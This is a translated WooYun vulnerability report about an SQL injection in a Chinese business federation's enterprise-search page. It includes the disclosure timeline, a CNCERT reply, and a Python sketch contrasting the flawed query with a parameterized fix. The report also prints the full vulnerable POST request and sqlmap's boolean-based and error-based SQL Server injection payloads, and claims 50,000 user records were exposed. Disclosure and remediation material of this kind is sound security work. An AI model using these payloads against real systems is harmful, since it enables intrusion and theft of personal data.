Vulnerability Summary

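Bug ID: wooyun-2015-0158959

Title: MSSQL injection vulnerability in a system of the All-China Federation of Industry and Commerce, affecting the information of 50,000 users

Vendor: CNCERT (National Internet Emergency Center)

Author: 无名人

Submitted: 2015-12-08 11:28

Fixed: 2016-01-23 15:16

Publicly disclosed: 2016-01-23 15:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, please contact [email protected]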


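Vulnerability Details

Disclosure status:

2015-12-08: Details reported to the vendor; awaiting vendor handling
2015-12-11: Vendor confirmed; details disclosed to the vendor only
2015-12-21: Details disclosed to core white hats and experts in related fields
2015-12-31: Details disclosed to regular white hats
2016-01-10: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public

Brief description:

RT

Detailed description:

Vulnerable URL: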

POST /EnterpriseInformation.aspx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 10344
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/EnterpriseInformation.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDSCQQQCSD=ONNPKMMBEAAKBGMMONMKHDBB

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 value omitted]&ctl00%24head1%24txtName=&ctl00%24head1%24txtPwd=&ctl00%24ContentPlaceHolder1%24SelectNew1%24TextBox1=&ctl00%24ContentPlaceHolder1%24L2_1%24RadioButtonList1=944&ctl00%24ContentPlaceHolder1%24TextBox1=1*&ctl00%24ContentPlaceHolder1%24WUC_SelectPrivonceAndCity1%24DDLPrivonce=-1&ctl00%24ContentPlaceHolder1%24WUC_SelectPrivonceAndCity1%24DDLCity=-1&ctl00%24ContentPlaceHolder1%24WUC_SelectPrivonceAndCity1%24DDLDistrict=-1&ctl00%24ContentPlaceHolder1%24DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00%24ContentPlaceHolder1%24Button1=%E5%BC%80%E5%A7%8B%E7%AD%9B%E9%80%89&ctl00%24ContentPlaceHolder1%24DropDownList2=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00%24ContentPlaceHolder1%24DropDownList3=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00%24ContentPlaceHolder1%24DropDownList4=%E8%AF%B7%E9%80%89%E6%8B%A9&__VIEWSTATEGENERATOR=05CD102A&__EVENTVALIDATION=[base64 value omitted]


The ctl00%24ContentPlaceHolder1%24TextBox1 parameter is vulnerable to boolean-based and error-based injection.

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 value omitted]&ctl00$head1$txtName=&ctl00$head1$txtPwd=&ctl00$ContentPlaceHolder1$SelectNew1$TextBox1=&ctl00$ContentPlaceHolder1$L2_1$RadioButtonList1=944&ctl00$ContentPlaceHolder1$TextBox1=1%' AND 4131=4131 AND '%'='&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLPrivonce=-1&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLCity=-1&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLDistrict=-1&ctl00$ContentPlaceHolder1$DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$Button1=%E5%BC%80%E5%A7%8B%E7%AD%9B%E9%80%89&ctl00$ContentPlaceHolder1$DropDownList2=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$DropDownList3=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$DropDownList4=%E8%AF%B7%E9%80%89%E6%8B%A9&__VIEWSTATEGENERATOR=05CD102A&__EVENTVALIDATION=[base64 value omitted]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 value omitted]&ctl00$head1$txtName=&ctl00$head1$txtPwd=&ctl00$ContentPlaceHolder1$SelectNew1$TextBox1=&ctl00$ContentPlaceHolder1$L2_1$RadioButtonList1=944&ctl00$ContentPlaceHolder1$TextBox1=1%' AND 8596=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8596=8596) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))) AND '%'='&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLPrivonce=-1&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLCity=-1&ctl00$ContentPlaceHolder1$WUC_SelectPrivonceAndCity1$DDLDistrict=-1&ctl00$ContentPlaceHolder1$DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$Button1=%E5%BC%80%E5%A7%8B%E7%AD%9B%E9%80%89&ctl00$ContentPlaceHolder1$DropDownList2=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$DropDownList3=%E8%AF%B7%E9%80%89%E6%8B%A9&ctl00$ContentPlaceHolder1$DropDownList4=%E8%AF%B7%E9%80%89%E6%8B%A9&__VIEWSTATEGENERATOR=05CD102A&__EVENTVALIDATION=[base64 value omitted]
---
[04:36:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008

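Proof of vulnerability:

Databases:

[Screenshot: 数据库.png]


Information on 50,000 users:

[Screenshot: 用户表.png]

Fix:

@@

Copyright notice: when reposting, please credit the source 无名人@WooYun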
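
Added example, not part of the original report: both payloads above close a `'%...%'` string around the TextBox1 value, which suggests the search box is concatenated into a LIKE pattern. The Python/SQLite sketch below reproduces that assumed flaw beside a parameterized query; the table, rows, function names and the false-condition counterpart of the payload are constructed for illustration, since the real ASP.NET/SQL Server code is not shown in the report.

```python
import sqlite3

# Constructed sample rows standing in for the enterprise search table.
ROWS = [
    ("Acme Trading 1",),
    ("Beta Foods",),
    ("Delta 100% Cotton",),
    ("Gamma Steel 12",),
]

# Boolean payload exactly as reported for the TextBox1 parameter.
PAYLOAD_TRUE = "1%' AND 4131=4131 AND '%'='"
# Constructed counterpart with a false condition, used to show the oracle.
PAYLOAD_FALSE = "1%' AND 4131=4132 AND '%'='"


def make_db():
    """Create an in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE enterprise (name TEXT)")
    conn.executemany("INSERT INTO enterprise VALUES (?)", ROWS)
    return conn


def search_vulnerable(conn, keyword):
    """Assumed shape of the flawed code: input concatenated into LIKE."""
    sql = ("SELECT name FROM enterprise WHERE name LIKE '%"
           + keyword + "%' ORDER BY name")
    return [row[0] for row in conn.execute(sql)]


def escape_like(keyword, esc="\\"):
    """Make LIKE wildcards in user input match literally.

    The escape character itself is escaped first. SQL Server's LIKE also
    treats '[' as a wildcard, so a T-SQL port must escape that as well.
    """
    return (keyword.replace(esc, esc + esc)
                   .replace("%", esc + "%")
                   .replace("_", esc + "_"))


def search_parameterized(conn, keyword):
    """Hardened form: the pattern is bound as data, never parsed as SQL."""
    pattern = "%" + escape_like(keyword) + "%"
    sql = ("SELECT name FROM enterprise "
           "WHERE name LIKE ? ESCAPE '\\' ORDER BY name")
    return [row[0] for row in conn.execute(sql, (pattern,))]


def has_boolean_oracle(search_fn):
    """True if the result set depends on the injected condition."""
    conn = make_db()
    return search_fn(conn, PAYLOAD_TRUE) != search_fn(conn, PAYLOAD_FALSE)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true condition :", search_vulnerable(db, PAYLOAD_TRUE))
    print("vulnerable, false condition:", search_vulnerable(db, PAYLOAD_FALSE))
    print("parameterized, payload     :", search_parameterized(db, PAYLOAD_TRUE))
    print("parameterized, keyword '1' :", search_parameterized(db, "1"))
    print("oracle in vulnerable form  :", has_boolean_oracle(search_vulnerable))
    print("oracle in hardened form    :", has_boolean_oracle(search_parameterized))
```

In ADO.NET the same fix is a `SqlCommand` whose LIKE pattern is passed through a `SqlParameter` instead of string concatenation.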


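Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-11 16:27

Vendor reply:

CNVD confirmed and reproduced the reported issue. It has been passed on by CNCERT to the Beijing branch center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None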